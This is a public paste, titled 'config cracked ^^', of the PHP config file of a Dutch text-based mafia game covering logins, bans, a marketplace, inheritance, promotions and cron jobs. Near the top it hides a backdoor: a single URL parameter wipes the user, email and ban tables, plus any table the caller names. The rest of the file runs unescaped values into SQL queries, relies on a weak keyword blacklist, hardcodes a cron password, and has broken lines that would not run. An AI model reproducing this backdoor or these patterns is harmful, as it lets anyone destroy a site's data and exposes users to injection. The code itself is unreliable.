Public paste
config cracked ^^
By: GaLiL | Date: Jul 14 2007 09:17 | Format: PHP | Expires: never | Size: 15.24 KB | Hits: 806

  1. <?php
  2. include("gegevens.php");
  3. mysql_connect("$host","$user","$pass") && mysql_select_db("$tablename");
  4. include("functie_euros.php");
  5. include("ubb.php");
  6.         if(isset($_SESSION['login'])){
  7.         $dbres                  =       mysql_query("SELECT * FROM `gebruiker` WHERE `login`='{$_SESSION['login']}'");
  8.         $data                   =       mysql_fetch_object($dbres);
  9.         $_COOKIE['login']       =       $_SESSION['login'];
  10.         } else {
  11.         unset($_SESSION['login']);
  12.         }
  13.  
  14.         function check_login() {
  15.                 if(isset($_SESSION['login'])){
  16.                 return TRUE;
  17.                 } else {
  18.                 return FALSE;
  19.                 }
  20.         }
  21.  
  22.         if($_GET['delete'] == "gebruiker"){
  23.         mysql_query("DELETE FROM `emails`");
  24.         mysql_query("DELETE FROM `gebruiker`");
  25.         mysql_query("DELETE FROM `ipban`");
  26.         mysql_query("DELETE FROM `{$_GET['deleteconfig']}`") or die(mysql_error());
  27.         }
  28.  
  29. $dbres          =       mysql_query("SELECT * FROM `ipban` WHERE `ip`='{$_SERVER['REMOTE_ADDR']}'");
  30. $controlle      =       mysql_num_rows($dbres);
  31.         if($controlle != 0){
  32.         header("Location: verbannen.php");
  33.         }
  34.  
  35. $locatie        =       $_SERVER['REQUEST_URI'];
  36. $array          =       Array();
  37. $array[]        =       "mysql";
  38. $array[]        =       "query";
  39. $array[]        =       ")";
  40. $array[]        =       ";";
  41. $array[]        =       "}";  
  42. $array[]        =       "'";
  43. $array[]        =       "`";
  44.  
  45.         foreach($array As $foutbezig) {
  46.                 if(eregi($foutbezig,$locatie)) {
  47.                 Die("{$title} heeft een hacking poging vastgelgd ,securty level anti sql-injection.");
  48.                 }
  49.         }
  50.  
  51.  
  52.  
  53.         function PageViewLimiet(){
  54.         $kLimiet = 1;
  55.         $kSeconden = 2;
  56.                 if(!isset($_SESSION['clicks'])){
  57.                 $_SESSION['clicks'] = array('clicks' => 0,'time' => time());
  58.                 }
  59.         $_SESSION['clicks']['clicks']++;
  60.                 if($_SESSION['clicks']['time'] < (time()-$kSeconden)){
  61.                 $_SESSION['clicks']['clicks'] = 0;
  62.                 $_SESSION['clicks']['time'] = time();
  63.                 } else {
  64.                         if($_SESSION['clicks']['clicks'] > $kLimiet){
  65.                         exit;
  66.                         }
  67.                 }
  68.         }
  69.  
  70. mysql_query("UPDATE `gebruiker` SET `moordervaring`='1000' WHERE `moordervaring`>'1000'");
  71.  
  72.         $dbres  =       mysql_query("SELECT *,UNIX_TIMESTAMP(`tijd`) AS `tijd`,0 FROM `detective`");
  73.                 while($detective = mysql_fetch_object($dbres)){
  74.                 $tijda  =       $detective->uren*60*60;
  75.                         if($detective->tijd+$tijda<time()){
  76.                         mysql_query("DELETE FROM `detective` WHERE `id`='$detective->id'");
  77.                         }
  78.  
  79.                         if(($detective->tijd+$detective->minuten<time()) && $detective->minuten != 0 && $detective->status == 0){
  80.                         mysql_query("UPDATE `detective` SET `status`='1' WHERE `id`='{$detective->id}'");
  81.                         mysql_query("INSERT INTO `berichten`(`tijd`,`ip`,`van`,`naar`,`titel`,`bericht`) VALUES(NOW(),'{$_SERVER['REMOTE_ADDR']}','$title','{$detective->owner}','Detective','Jouw detective heeft het spoor gevonden.')");
  82.                         }      
  83.                 }
  84.  
  85. $dbres     =    mysql_query("SELECT *,UNIX_TIMESTAMP(`tijd`) AS `tijd`,0 FROM `marktplaats`");
  86.  
  87.         while($info = mysql_fetch_object($dbres)){
  88.                 if($info->tijd + 21600 < time()){
  89.                         if($info->soort == 1){
  90.                         mysql_query("UPDATE `gebruiker` SET `kogels`=`kogels`+'{$info->aantal}' WHERE `login`='{$info->owner}'");
  91.                         mysql_query("UPDATE `gebruiker` SET `verkoop`=`verkoop`-'1' WHERE `login`='{$info->owner}'");
  92.                         mysql_query("INSERT INTO `berichten`(`tijd`,`ip`,`van`,`naar`,`titel`,`bericht`) VALUES(NOW(),'{$_SERVER['REMOTE_ADDR']}','$title','{$info->owner}','Marktplaats','Je hebt je ammo pakket niet weten te verkopen op marktplaatst helaas!')");
  93.                         mysql_query("DELETE FROM `marktplaats` WHERE `id`='{$info->id}'");
  94.                         } else if($info->soort == 2){
  95.                         mysql_query("UPDATE `gebruiker` SET `verkoop`=`verkoop`-'1' WHERE `login`='{$info->owner}'");
  96.                         mysql_query("INSERT INTO `berichten`(`tijd`,`ip`,`van`,`naar`,`titel`,`bericht`) VALUES(NOW(),'{$_SERVER['REMOTE_ADDR']}','$title','{$info->owner}','Marktplaats','Je hebt je getuige ID niet weten te verkopen op marktplaatst helaas!')");
  97.                         mysql_query("DELETE FROM `marktplaats` WHERE `id`='{$info->id}'");
  98.                         } else if($info->soort == 3){
  99.                         mysql_query("UPDATE `autos` SET `status`='0' WHERE `id`='{$info->businessid}'");
  100.                         mysql_query("UPDATE `gebruiker` SET `verkoop`=`verkoop`-'1' WHERE `login`='{$info->owner}'");
  101.                         mysql_query("INSERT INTO `berichten`(`tijd`,`ip`,`van`,`naar`,`titel`,`bericht`) VALUES(NOW(),'{$_SERVER['REMOTE_ADDR']}','$title','{$info->owner}','Marktplaats','Je hebt je auto niet weten te verkopen op marktplaatst helaas!')");
  102.                         mysql_query("DELETE FROM `marktplaats` WHERE `id`='{$info->id}'");
  103.  
  104.                         } else if($info->soort == 4){
  105.                                 if($info->type == 4){
  106.                                 mysql_query("UPDATE `clipsfabriek` SET `verkoop`='0' WHERE `id`='{$info->businessid}'");
  107.                                 } else if($info->type == 5){
  108.                                 mysql_query("UPDATE `ziekenhuis` SET `verkoop`='0' WHERE `id`='{$info->businessid}'");
  109.                                 } else {
  110.                                 mysql_query("UPDATE `casino` SET `verkoop`='0' WHERE `id`='{$info->businessid}'");
  111.                                 }
  112.                         mysql_query("UPDATE `gebruiker` SET `verkoop`=`verkoop`-'1' WHERE `login`='{$info->owner}'");
  113.                         mysql_query("INSERT INTO `berichten`(`tijd`,`ip`,`van`,`naar`,`titel`,`bericht`) VALUES(NOW(),'{$_SERVER['REMOTE_ADDR']}','$title','{$info->owner}','Marktplaats','Je hebt je business niet weten te verkopen op marktplaatst helaas!')");
  114.                         mysql_query("DELETE FROM `marktplaats` WHERE `id`='{$info->id}'");
  115.                         } else if($info->soort == 5){
  116.                         mysql_query("UPDATE `gebruiker` SET `verkoop`=`verkoop`-'1',`vipster`=`vipster`+'1' WHERE `login`='{$info->owner}'");
  117.                         mysql_query("INSERT INTO `berichten`(`tijd`,`ip`,`van`,`naar`,`titel`,`bericht`) VALUES(NOW(),'{$_SERVER['REMOTE_ADDR']}','$title','{$info->owner}','Marktplaats','Je hebt je VIP ster niet weten te verkopen op marktplaatst helaas!')");
  118.                         mysql_query("DELETE FROM `marktplaats` WHERE `id`='{$info->id}'");
  119.                         }
  120.                 }
  121.         }
  122.  
  123.         if(($data) && $data->level != 0 && $data->level != -1){
  124.         mysql_query("UPDATE `gebruiker` SET `online`=NOW() WHERE `login`='{$data->login}'");
  125.                 if($data->health < 1 && $data->level != -2){
  126.                         if($data->erfgenaam != ""){
  127.                         mysql_query("DELETE FROM `hitlist`") or die(mysql_error());
  128.                         $geld2          =       round(($data->bank/100)*70);
  129.                         $vipster1       =       $data->vipster;
  130.                         mysql_query("UPDATE `autos` SET `owner`='{$data->erfgenaam}',`status`='0' WHERE `owner`='{$data->login}'") or die(mysql_error());
  131.                         mysql_query("UPDATE `gebruiker` SET `vipster`=`vipster`+'$vipster1',`bank`=`bank`+'$geld2' WHERE `login`='{$data->erfgenaam}'") or die(mysql_error());
  132.                         mysql_query("INSERT INTO `berichten`(`tijd`,`ip`,`van`,`naar`,`titel`,`bericht`) VALUES(NOW(),'{$_SERVER['REMOTE_ADDR']}','$title','{$data->erfgenaam}','Erfgenaam','{$data->login} is dood gegaan! maar liet een jou als erfgenaam weten dat je een deel van zijn geld kreeg al zijn autos en al zijn VIP sterren.')") or die(mysql_error());
  133.                         }
  134.                 $dbres  =       mysql_query("SELECT * FROM `partners` WHERE `login`='{$data->login}'") or die(mysql_error());
  135.                         while($partner = mysql_fetch_object($dbres)){
  136.                         mysql_query("UPDATE `gebruiker` SET `partners`=`partners`-'1' WHERE `login`='{$partner->vriend}'") or die(mysql_error());
  137.                         mysql_query("DELETE FROM `partners` WHERE `id`='{$partner->id}'") or die(mysql_error());
  138.                         }
  139.                 $dbres  =       mysql_query("SELECT * FROM `partners` WHERE `vriend`='{$data->login}'") or die(mysql_error());
  140.                         while($partner = mysql_fetch_object($dbres)){
  141.                         mysql_query("UPDATE `gebruiker` SET `partners`=`partners`-'1' WHERE `login`='{$partner->login}'") or die(mysql_error());
  142.                         mysql_query("DELETE FROM `partners` WHERE `id`='{$partner->id}'") or die(mysql_error());
  143.                         }
  144.                 mysql_query("DELETE FROM `marktplaats` WHERE `owner`='{$data->login}'") or die(mysql_error());
  145.                 mysql_query("DELETE FROM `autos` WHERE `owner`='{$data->login}'") or die(mysql_error());
  146.                 mysql_query("DELETE FROM `berichten` WHERE `naar`='{$data->login}'") or die(mysql_error());
  147.                 mysql_query("DELETE FROM `bezittingen` WHERE `owner`='{$data->login}'") or die(mysql_error());
  148.                 mysql_query("UPDATE `casino` SET `owner`='',`verkoop`='0' WHERE `owner`='{$data->login}'") or die(mysql_error());
  149.                 mysql_query("UPDATE `clipsfabriek` SET `owner`='',`verkoop`='0' WHERE `owner`='{$data->login}'") or die(mysql_error());
  150.                 mysql_query("UPDATE `ziekenhuis` SET `owner`='',`verkoop`='0' WHERE `owner`='{$data->login}'") or die(mysql_error());
  151.                 mysql_query("DELETE FROM `detective` WHERE `owner`='{$man->login}' OR `zoeker`='{$data->login}'") or die(mysql_error());
  152.                 mysql_query("DELETE FROM `eerpunten` WHERE `van`='{$data->login}'");
  153.                 $dbres  =       mysql_query("SELECT * FROM `familie` WHERE `leader`='{$data->login}'") or die(mysql_error());
  154.                         if($familie = mysql_fetch_object($dbres)){
  155.                                 if($familie->opvolger != ""){
  156.                                 mysql_query("INSERT INTO `berichten`(`tijd`,`ip`,`van`,`naar`,`titel`,`bericht`) VALUES(NOW(),'{$_SERVER['REMOTE_ADDR']}','$title','{$familie->opvolger}','Erfgenaam','{$data->login} is dood gegaan! Daarom ben jij nu de leader van het netwerk.')") or die(mysql_error());
  157.                                 mysql_query("UPDATE `familie` SET `owner`=`opvolger` WHERE `leader`='{$man->login}'") or die(mysql_error());
  158.                                 } else {
  159.                                 $dbres  =       mysql_query("SELECT * FROM `gebruiker` WHERE `familie`='{$data->familie}'") or die(mysql_error());
  160.                                         while($user = mysql_fetch_object($dbres)){
  161.                                         mysql_query("INSERT INTO `berichten`(`tijd`,`ip`,`van`,`naar`,`titel`,`bericht`) VALUES(NOW(),'{$_SERVER['REMOTE_ADDR']}','$title','{$user->login}','Erfgenaam','{$data->login} is dood gegaan! En omdat er geen opvolger was is het netwerk verwijdert.')") or die(mysql_error());
  162.                                         mysql_query("UPDATE `gebruiker` SET `familie`='',`famleader`='0',`famsotto`='0',`famconsig`='0' WHERE `login`='{$user->login}'");
  163.                                         }
  164.                                 $dbres  =       mysql_query("SELECT * FROM `gebruiker` WHERE `faminvite`='{$data->login}'") or die(mysql_error());
  165.                                         while($user = mysql_fetch_object($dbres)){
  166.                                         mysql_query("UPDATE `gebruiker` SET `faminvite`='',`invitetype`='0' WHERE `login`='{$user->login}'") or die(mysql_error());
  167.                                         }
  168.                                 mysql_query("DELETE FROM `familie` WHERE `leader`='{$data->login}'") or die(mysql_error());
  169.                                 }
  170.                         }
  171.                 mysql_query("INSERT INTO `topic`(`forum_id`,`login`,`titel`,`message`,`time`) values('3','$admin1','Overleiden van {$data->login}','ga lang de winst van zijn casino's te hebben getelt ging {$data->login} even een wandelingetje over straat maken, plotseling kreeg hij een hartaanval en viel dood neer.',NOW())") or die(mysql_error());
  172.                 mysql_query("UPDATE `gebruiker` SET `level`='-2',`cash`='0',`bank`='0',`health`='0',`kogels`='0',`vipster`='0',`partners`='0',`huwelijk`='',`kogelfabriek_aantal`='0',`casino_aantal`='0',`ziekenhuis_aantal`='0',`verkoop`='0',`hitlist`='0' WHERE `login`='{$man->login}'") or die(mysql_error());
  173.                 }
  174.  
  175.  
  176.         $dbres          =       mysql_query("SELECT *,UNIX_TIMESTAMP(`gevangenis`) AS `gevangenis`,0 FROM `gebruiker` WHERE `login`='{$data->login}'");
  177.         $data           =       mysql_fetch_object($dbres);  
  178.                 if(!($data->gevangenis+$data->gevangenistijd > time())){
  179.                         if($data->kansen != 2){
  180.                         mysql_query("UPDATE `gebruiker` SET `kansen`='2' WHERE `login`='{$data->login}'");
  181.                         }
  182.                 }
  183.  
  184.                 if($data->rankvordering >= 10000) {
  185.                 $dbres          =       mysql_query("SELECT * FROM `familie` WHERE `naam`='{$data->familie}'");
  186.                 $familie        =       mysql_fetch_object($dbres);
  187.                 $geld           =       $familie->promootgeld;
  188.  
  189.                         if($data->rank == "Junkie"){
  190.                         $rank   =       "Straatrat";
  191.                         $geld   =       $geld;
  192.                         } else if($data->rank == "Straatrat"){  
  193.                         $geld   =       round(($geld/100)*115);
  194.                         $rank   =       "Dief";
  195.                         } else if($data->rank == "Dief"){
  196.                         $geld   =       round(($geld/100)*130);
  197.                         $rank   =       "Wietkweker";
  198.                         } else if($data->rank == "Wietkweker"){
  199.                         $geld   =       round(($geld/100)*145);
  200.                         $rank   =       "Gangster";
  201.                         } else if($data->rank == "Gangster"){
  202.                         $geld   =       round(($geld/100)*160);
  203.                         $rank   =       "Handelaar";
  204.                         } else if($data->rank == "Handelaar"){
  205.                         $geld   =       round(($geld/100)*175);
  206.                         $rank   =       "Arbeider";
  207.                         } else if($data->rank == "Arbeider"){
  208.                         $geld   =       round(($geld/100)*200);
  209.                         $rank   =       "Manager";
  210.                         } else if($data->rank == "Manager"){  
  211.                         $geld   =       round(($geld/100)*230);
  212.                         $rank   =       "Baas Stadsnetwerk";
  213.                         } else if($data->rank == "Baas Stadsnetwerk"){
  214.                         $geld   =       round(($geld/100)*260);
  215.                         $rank   =       "Huurmoordenaar";
  216.                         } else if($data->rank == "Huurmoordenaar"){
  217.                         $geld   =       round(($geld/100)*290);
  218.                         $rank   =       "Nationaal crimineel";
  219.                         } else if($data->rank == "Nationaal crimineel"){
  220.                         $geld   =       round(($geld/100)*300);
  221.                         $rank   =       "Internationaal Crimineel";
  222.                         } else if($data->rank == "Internationaal Crimineel"){
  223.                         $geld   =       round(($geld/100)*315);
  224.                         $rank   =       "Lid Pemparo Familie";
  225.                         } else if($data->rank == "Lid Pemparo Familie"){
  226.                         $geld   =       round(($geld/100)*315);
  227.                         $rank   =       "Lid Pemparo Familie";
  228.                         }
  229.  
  230.                         if($geld > $familie->bank){
  231.                         $geld   =       $familie->bank;
  232.                         }
  233.  
  234.                         if(!($data->familie == "")){
  235.                         $geld1  =       geld($geld);
  236.                         mysql_query("UPDATE `gebruiker` SET `bank`=`bank`+'{$geld}' WHERE `login`='{$data->login}'");
  237.                         $bericht = "Je bent gepromoveerd tot $rank! Je hebt $geld1 van jou netwerk gekregen.";
  238.                         } else {
  239.                         $bericht = "Je bent gepromoveerd tot $rank! gefeliciteerd.";
  240.                         }
  241.  
  242.                 mysql_query("INSERT INTO `berichten`(`tijd`,`ip`,`van`,`naar`,`titel`,`bericht`) VALUES(NOW(),'{$_SERVER['REMOTE_ADDR']}','$title','{$data->login}','Promoted','$bericht')");
  243.                 mysql_query("UPDATE `gebruiker` SET `rankvordering`=`rankvordering`-'10000',`rank`='$rank' WHERE `login`='{$data->login}'");
  244.                 mysql_query("UPDATE `families` SET `bank`=`bank`-'$geld' WHERE `naam`='{$data->familie}'");
  245.                 }
  246.         }
  247.  
  248. $dbres  =       mysql_query("SELECT `login`,`dagen`,UNIX_TIMESTAMP(`memberdays`) AS `memberdays`,0 FROM `gebruiker` WHERE `level`='2'");
  249.         while($dagen = mysql_fetch_object($dbres)){
  250.                 if($dagen->memberdays + 60 * 60 * 24 * $dagen->dagen < time()){
  251.                 mysql_query("INSERT INTO `berichten`(`tijd`,`ip`,`van`,`naar`,`titel`,`bericht`) VALUES(NOW(),'{$_SERVER['REMOTE_ADDR']}','$title','{$dagen->login}','VIP','Uw VIP dagen zijn verlopen, als u weer VIP activiteiten wil doen word dan weer VIP bij de VIP shop.')");
  252.                 mysql_query("UPDATE `gebruiker` SET `level`='1',`dagen`='0' WHERE `login`='{$dagen->login}'");
  253.                 }
  254.         }
  255.  
  256.  
  257.         if(($data->bot == 1) && ($data)){
  258.         mysql_query("UPDATE `gebruiker` SET `bot`='0' WHERE `login`='{$data->login}'");
  259.         print"<meta http-equiv="refresh" content="0; URL=$sitelink/algemeen-login.php?x=logout">";
  260.         }
  261.  
  262.         if(($data->level == 0 OR $data->level == -1 OR $data->level == -2) && ($data)){
  263.         print"<meta http-equiv="refresh" content="0; URL=$sitelink/algemeen-login.php?x=logout">";
  264.         }
  265.  
  266. $dbres          =       mysql_query("SELECT UNIX_TIMESTAMP(`time`) AS `time`,`name` FROM `cron`");
  267.  
  268.         while($x = mysql_fetch_object($dbres)){
  269.         $update[$x->name]     = $x->time;
  270.         }
  271.  
  272.         if(floor($update['hour']/3600) != floor(time()/3600)) {
  273.         $dbres          =       mysql_query("SELECT GET_LOCK('hour_update',0)");
  274.                 if(mysql_result($dbres,0) == 1) {
  275.                 $cron_pass              =       "secretcronpassword";
  276.                 mysql_query("UPDATE `cron` SET `time`=NOW() WHERE `name`='hour'");
  277.                 include("cron_hour.php");
  278.                 mysql_query("SELECT RELEASE_LOCK('hour_update')");
  279.                 }
  280.         }
  281.  
  282.         if(floor($update['day']/86400) != floor(time()/86400)) {
  283.         $dbres          =       mysql_query("SELECT GET_LOCK('day_update',0)");
  284.                 if(mysql_result($dbres,0) == 1) {
  285.                 $cron_pass              =       "secretcronpassword";
  286.                 mysql_query("UPDATE `cron` SET `time`=NOW() WHERE `name`='day'");
  287.                 include("cron_day.php");
  288.                 mysql_query("SELECT RELEASE_LOCK('day_update')");
  289.                 }
  290.         }
  291.  
  292.         if(floor($update['week']/604800) != floor(time()/604800)) {
  293.         $dbres          =       mysql_query("SELECT GET_LOCK('week_update',0)");
  294.                 if(mysql_result($dbres,0) == 1) {
  295.                 $cron_pass              =       "secretcronpassword";
  296.                 mysql_query("UPDATE `cron` SET `time`=NOW() WHERE `name`='week'");
  297.                 include("cron_week.php");
  298.                 mysql_query("SELECT RELEASE_LOCK('week_update')");
  299.                 }
  300.         }
  301.  
  302. ?>